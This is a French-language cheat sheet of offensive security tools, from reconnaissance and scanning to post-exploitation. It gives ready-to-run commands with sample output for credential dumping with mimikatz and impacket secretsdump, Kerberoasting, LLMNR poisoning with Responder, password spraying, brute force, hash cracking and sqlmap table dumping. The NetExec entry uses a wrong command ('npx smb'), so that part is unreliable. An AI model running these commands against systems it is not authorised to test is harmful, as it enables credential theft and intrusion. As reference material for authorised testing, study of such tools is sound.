$ theharvester -d example.com -b all -l 500
theHarvester est un outil conçu pour aider les professionnels de la cybersécurité lors de la phase de reconnaissance initiale. Il interroge un grand nombre de moteurs de recherche et de bases de données publiques (Google, Bing, Hunter.io, Shodan) pour extraire des adresses e-mail, sous-domaines, IPs et noms d'utilisateurs liés à une organisation cible.
| Command | Example Usage | Function | Output Example |
|---|---|---|---|
-d / -b | theharvester -d domain.com -b google | Recherche les e-mails et hôtes sur une source spécifique. | [*] Target: domain.com [*] Searching Google... Emails found: admin@domain.com |
-b all | theharvester -d domain.com -b all | Interroge l'intégralité des moteurs et sources de données OSINT. | [*] Searching All Sources... Hosts found: 12 Users found: 4 |
$ amass enum -d example.com -active -src
Amass utilise un large assortiment de techniques passives et actives pour réaliser la cartographie des surfaces d'attaque et la découverte d'actifs externes. Il intègre des mécanismes d'altération de nom, de bruteforce DNS et de requêtes BGP/ASN pour répertorier l'infrastructure complète d'un domaine.
| Command | Example Usage | Function | Output Example |
|---|---|---|---|
enum | amass enum -d domain.com | Exécute l'énumération par défaut des noms de sous-domaines. | api.domain.com mail.domain.com vpn.domain.com |
intel | amass intel -org "Example Corp" | Découvre les domaines appartenant à une organisation spécifique via la recherche ASN. | example.com example-net.com |
$ recon-ng -w default -m discovery/domains-hosts/bing_domain_web
Recon-ng est un environnement de reconnaissance open source basé sur Python. Il dispose d'une architecture modulaire (découverte, rapports, transformation) permettant d'interroger automatiquement diverses API externes et de stocker les résultats dans une base de données SQLite interne.
| Command | Example Usage | Function | Output Example |
|---|---|---|---|
workspaces | workspaces create my_target | Crée un espace de travail isolé pour organiser les données collectées. | [+] Workspace created: my_target |
modules load | modules load hackertarget | Charge un module d'acquisition OSINT spécifique. | [recon-ng][default][hackertarget]> |
$ shodan search --fields ip_str,port,org 'apache country:FR'
L'outil Shodan CLI permet d'automatiser les requêtes sur la base de données Shodan. Il permet d'identifier les serveurs, webcams, routeurs, bases de données exposées et systèmes ICS/SCADA accessibles directement depuis Internet sans avoir à scanner le réseau cible.
| Command | Example Usage | Function | Output Example |
|---|---|---|---|
host | shodan host 1.1.1.1 | Affiche les ports ouverts et les bannières de services pour une IP. | 1.1.1.1 Ports: 53, 80, 443 Org: Cloudflare |
search | shodan search org:"Target Inc" | Recherche tous les appareils référencés appartenant à une entreprise. | 192.0.2.10:80 HTTP 192.0.2.11:22 SSH |
$ python sublist3r.py -d example.com -t 10 -v -o output.txt
Sublist3r permet aux chercheurs en sécurité de collecter les sous-domaines d'un domaine donné en interrogeant simultanément des moteurs de recherche comme Google, Yahoo, Bing, Baidu et Ask, ainsi que des plateformes comme Virustotal et ThreatCrowd.
| Command | Example Usage | Function | Output Example |
|---|---|---|---|
-d | sublist3r -d domain.com | Lance l'énumération standard pour le domaine cible. | [-] Searching in Google... admin.domain.com mail.domain.com |
-b | sublist3r -d domain.com -b -p 80,443 | Déclenche le module de bruteforce et vérifie les ports HTTP. | [+] Subdomain found: dev.domain.com (Port 80 Open) |
$ nmap -sCV -p- -T4 192.168.1.1
Nmap (Network Mapper) est l'outil standard de balayage réseau. Il utilise des paquets IP bruts pour déterminer quels hôtes sont disponibles sur le réseau, quels services (nom de l'application et version) ils offrent, quels systèmes d'exploitation ils exécutent, et quels types de pare-feu sont utilisés.
| Command | Example Usage | Function | Output Example |
|---|---|---|---|
-sS | nmap -sS -p 22,80,443 10.10.10.10 | Exécute un balayage TCP SYN discret (Stealth Scan). | PORT STATE SERVICE 22/tcp open ssh 80/tcp open http |
-sC -sV | nmap -sC -sV 10.10.10.10 | Détecte les versions des services et exécute les scripts NSE par défaut. | 80/tcp open http Apache httpd 2.4.41 |
$ masscan -p80,443 10.0.0.0/8 --rate=10000
Masscan est le scanner de réseau le plus rapide à l'heure actuelle. Il utilise une pile d'exécution asynchrone pour envoyer des paquets bruts indépendamment du noyau du système d'exploitation, permettant des débits allant jusqu'à 10 millions de paquets par seconde.
| Command | Example Usage | Function | Output Example |
|---|---|---|---|
--rate | masscan 192.168.1.0/24 -p0-65535 --rate 1000 | Définit le nombre de paquets émis par seconde pour le balayage. | Discovered open port 80/tcp on 192.168.1.50 Discovered open port 22/tcp on 192.168.1.1 |
$ rustscan -a 192.168.1.1 -- -sC -sV
RustScan combine la rapidité de détection des ports ouverts par multithreading ultra-rapide avec la profondeur d'analyse de Nmap en exécutant automatiquement ce dernier sur les seuls ports trouvés ouverts.
| Command | Example Usage | Function | Output Example |
|---|---|---|---|
-a | rustscan -a 10.10.10.10 | Trouve tous les ports ouverts en moins de 3 secondes. | Open 22 Open 80 Open 443 Automatically executing Nmap... |
$ ffuf -u https://example.com/FUZZ -w /path/to/wordlist.txt -mc 200,301
ffuf est un fuzzer web haute performance. Le mot-clé FUZZ est remplacé dynamique dans l'URL, les en-têtes ou le corps de la requête par les entrées d'une dictionnaire pour trouver des paramètres vulnérables ou du contenu caché.
| Command | Example Usage | Function | Output Example |
|---|---|---|---|
-u / -w | ffuf -u http://target/FUZZ -w common.txt | Fuzze le chemin d'accès aux répertoires web. | admin [Status: 301, Size: 178] robots.txt [Status: 200, Size: 45] |
-H (VHost) | ffuf -u http://target -H "Host: FUZZ.domain.com" -w vhosts.txt | Découvre les hôtes virtuels de serveurs web mutualisés. | dev [Status: 200, Size: 4321] |
$ gobuster dir -u https://example.com -w /path/to/wordlist.txt -x php,html
Gobuster est apprécié pour sa stabilité. Il permet d'exécuter des recherches intensives sur des serveurs HTTP, d'énumérer les enregistrements DNS ou d'identifier des partages réseau Amazon S3 et SMB.
| Command | Example Usage | Function | Output Example |
|---|---|---|---|
dir | gobuster dir -u http://10.10.10.10 -w /wordlist.txt | Énumère les répertoires et fichiers sur un serveur HTTP. | /images (Status: 301) /index.php (Status: 200) |
dns | gobuster dns -d target.com -w subdomains.txt | Énumère les sous-domaines via des requêtes DNS. | Found: ns1.target.com Found: mail.target.com |
$ dirsearch -u https://example.com -e php,cgi,htm,js,txt -t 30
Dirsearch est un outil en ligne de commande conçu pour la découverte par force brute de répertoires et de fichiers cachés sur les serveurs web. Il intègre un système d'analyse automatique des erreurs et un formatage coloré très clair.
| Command | Example Usage | Function | Output Example |
|---|---|---|---|
-u / -e | dirsearch -u http://target -e php,html | Scanne l'URL avec les extensions spécifiées. | [14:22:01] 200 - 1KB - /login.php [14:22:05] 301 - 0B - /admin -> /admin/ |
$ nikto -h https://example.com -ssl
Nikto est un scanner de serveur web open source qui teste les serveurs HTTP pour détecter les logiciels obsolètes, les fichiers d'installation résiduels, les en-têtes de sécurité manquants et les mauvaises configurations courantes.
| Command | Example Usage | Function | Output Example |
|---|---|---|---|
-h | nikto -h 192.168.1.10 -p 80,443 | Exécute l'analyse globale de vulnérabilité sur les ports indiqués. | + Server: Apache/2.4.7 + Anti-clickjacking X-Frame-Options header is not present. |
$ nuclei -u https://example.com -t cves/ -severity critical,high
Nuclei permet de rechercher des vulnérabilités connues (CVEs), des erreurs de configuration et des fuites de données à l'aide de simples définitions de requêtes basées sur le langage YAML et exécutées en parallèle à très grande vitesse.
| Command | Example Usage | Function | Output Example |
|---|---|---|---|
-t | nuclei -u http://target.com -t technologies/ | Identifie les composants et CMS exécutés sur le serveur. | [wordpress-detect] [http] [info] https://target.com |
-severity | nuclei -u http://target.com -severity critical | Filtre les tests uniquement pour les failles critiques. | [CVE-2021-44228] [http] [critical] https://target.com/log4j |
$ wpscan --url https://example.com --enumerate p,t,u --api-token YOUR_TOKEN
WPScan est un outil en ligne de commande qui énumère les thèmes, extensions (plugins) et comptes d'utilisateurs sur les installations WordPress. Connecté à sa base de données de failles connues, il répertorie les failles de sécurité non corrigées sur le CMS cible.
| Command | Example Usage | Function | Output Example |
|---|---|---|---|
--enumerate u | wpscan --url http://blog.com -e u | Énumère l'ensemble des identifiants d'auteurs du site. | [+] Identified Usernames: | id: 1, name: admin | id: 2, name: editor |
$ parth scan https://example.com
Parth est écrit en Python et permet d'examiner les structures d'URL afin de déterminer la présence de vulnérabilités courantes (injection SQL, XSS, SSRF) en révélant les paramètres masqués traités par l'application web.
| Command | Example Usage | Function | Output Example |
|---|---|---|---|
scan | parth scan https://example.com | Initie l'analyse complète des paramètres de l'URL cible. | [+] Parameter found: ?id=1 (Potential SQLi) [+] Parameter found: ?redirect= (Potential SSRF) |
$ mimikatz.exe 'privilege::debug' 'sekurlsa::logonpasswords' exit
Mimikatz est un outil post-exploitation open source créé par Benjamin Delpy. Il est utilisé pour extraire des identifiants en clair, des hachages NTLM, des tickets Kerberos et des codes PIN directement de la mémoire système sous Windows via l'analyse du processus LSASS.
| Command | Example Usage | Function | Output Example |
|---|---|---|---|
privilege::debug | mimikatz # privilege::debug | Demande le privilège SeDebugPrivilege nécessaire à la lecture mémoire. | Privilege '20' OK |
sekurlsa::logonpasswords | mimikatz # sekurlsa::logonpasswords | Extrait les identifiants de toutes les sessions actives en mémoire. | User Name : Administrator NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0 |
lsadump::lsa | mimikatz # lsadump::lsa /patch | Extrait les hachages NTLM de la base LSA locale. | RID : 000001f4 (500) User : Administrator NTLM : e19724d7437d64b0e732503d29cb1eed |
$ bloodhound-python -u user -p pass -d domain.local -gc domain.local -c All
BloodHound utilise la théorie des graphes pour cartographier visuellement les permissions Active Directory, identifier les comptes privilégiés et afficher automatiquement la route la plus courte pour devenir Domain Admin.
| Command | Example Usage | Function | Output Example |
|---|---|---|---|
SharpHound.exe | SharpHound.exe -c All | Collecte les objets et ACL du domaine sous forme d'archives ZIP. | 20260826_BloodHound.zip generated |
$ sudo responder -I eth0 -dwv
Responder écoute les requêtes de résolution de noms échouées sur un réseau local. Il répond en se faisant passer pour la ressource demandée afin de pousser la machine victime à transmettre son hachage de session NTLMv2.
| Command | Example Usage | Function | Output Example |
|---|---|---|---|
-I (Interface) | responder -I eth0 | Démarre l'écouteur et empoisonne les requêtes LLMNR/NBT-NS. | [LLMNR] Poisoned answer sent to 192.168.1.15 [HTTP] NTLMv2 Hash Captured : USER::DOMAIN:112233... |
$ impacket-psexec domain/user:password@192.168.1.100
Impacket offre une collection complète de scripts d'exécution à distance et d'attaques réseau Active Directory, incluant psexec, wmiexec, secretsdump (dump de la base NTDS.dit) et GetUserSPNs (Kerberoasting).
| Command | Example Usage | Function | Output Example |
|---|---|---|---|
secretsdump.py | impacket-secretsdump domain/user:pass@10.0.0.1 | Extrait les hachages NTLM à distance via le registre ou NTDS.dit. | Administrator:500:aad3b435...:31d6cfe0d16ae931...::: |
GetUserSPNs.py | impacket-GetUserSPNs domain/user:pass -request | Exécute une attaque Kerberoasting pour extraire des tickets Service. | $krb5tgs$23$*user$DOMAIN.LOCAL$... |
$ npx smb 192.168.1.0/24 -u users.txt -p passwords.txt --continue-on-success
NetExec est le successeur de CrackMapExec. Il permet de tester la validité d'identifiants sur des plages IP entières, d'exécuter des commandes système via SMB ou WinRM et de vérifier l'accès aux partages de fichiers.
| Command | Example Usage | Function | Output Example |
|---|---|---|---|
smb --shares | npx smb 10.10.10.0/24 -u admin -p pass --shares | Énumère les partages SMB accessibles sur le sous-réseau. | SMB 10.10.10.50: [+] DOMAIN\admin:pass (Pwn3d!) C$ READ,WRITE SYSVOL READ |
$ hydra -l admin -P /path/to/passwords.txt 192.168.1.1 ssh -t 16
Hydra est un outil de test de résistance des mots de passe. Il permet de réaliser des attaques parallélisées et personnalisables contre des formulaires Web, des bases de données ou des services d'administration à distance.
| Command | Example Usage | Function | Output Example |
|---|---|---|---|
-L / -P | hydra -L users.txt -P pass.txt 10.0.0.1 ssh | Teste une liste d'utilisateurs et de mots de passe sur SSH. | [22][ssh] host: 10.0.0.1 login: admin password: Password1 |
$ hashcat -m 1000 -a 0 hashes.txt rockyou.txt --force
Hashcat prend en charge des centaines de types de hachages (MD5, SHA, NTLM, Kerberos, WPA2). Grâce au support d'OpenCL et CUDA, il permet d'exécuter des attaques basées sur des masques, des dictionnaires avec règles et des combinaisons avancées.
| Command | Example Usage | Function | Output Example |
|---|---|---|---|
-m 1000 | hashcat -m 1000 -a 0 ntlm.txt wordlist.txt | Casse des hachages NTLM Windows avec une liste de mots. | 31d6cfe0d16ae931b73c59d7e0c089c0:Password123 Status: Cracked |
$ john --wordlist=/path/to/rockyou.txt hashes.txt
John the Ripper est un outil hors-ligne conçu pour tester la sécurité des mots de passe UNIX, Windows et des fichiers protégés (ZIP, PDF, SSH keys). Il propose un mode "Single Crack" très efficace basé sur les informations de compte.
| Command | Example Usage | Function | Output Example |
|---|---|---|---|
--show | john --show hashes.txt | Affiche les mots de passe déjà découverts. | admin:secret123 1 password hash cracked |
$ sqlmap -u "https://example.com/item.php?id=1" --batch --dbs
SQLmap automatise le processus de détection et d'exploitation des failles d'injection SQL. Il intègre des moteurs puissants d'extraction de données, de lecture du système de fichiers distant et d'exécution de commandes système via la base de données.
| Command | Example Usage | Function | Output Example |
|---|---|---|---|
--dbs | sqlmap -u "http://target/page?id=1" --dbs | Énumère l'ensemble des bases de données disponibles. | available databases [2]: [*] information_schema [*] target_db |
--dump | sqlmap -u "http://target/page?id=1" -D target_db -T users --dump | Exfiltre les données d'une table spécifique. | +----+-------+----------+ | id | user | pass | +----+-------+----------+ | 1 | admin | admin123 | |
Proxy HTTP écoute sur 127.0.0.1:8080
Burp Suite est le standard de l'industrie pour le pentest applicatif web. Il intercepte, modifie et rejoue le trafic HTTP/HTTPS entre le navigateur et le serveur d'application grâce aux modules Intercept, Repeater et Intruder.
| Module | Example Usage | Function | Output Example |
|---|---|---|---|
Repeater | Interception & Replay de requêtes HTTP | Permet d'altérer manuellement les paramètres et de lire la réponse. | HTTP/1.1 200 OK Set-Cookie: session=admin_token |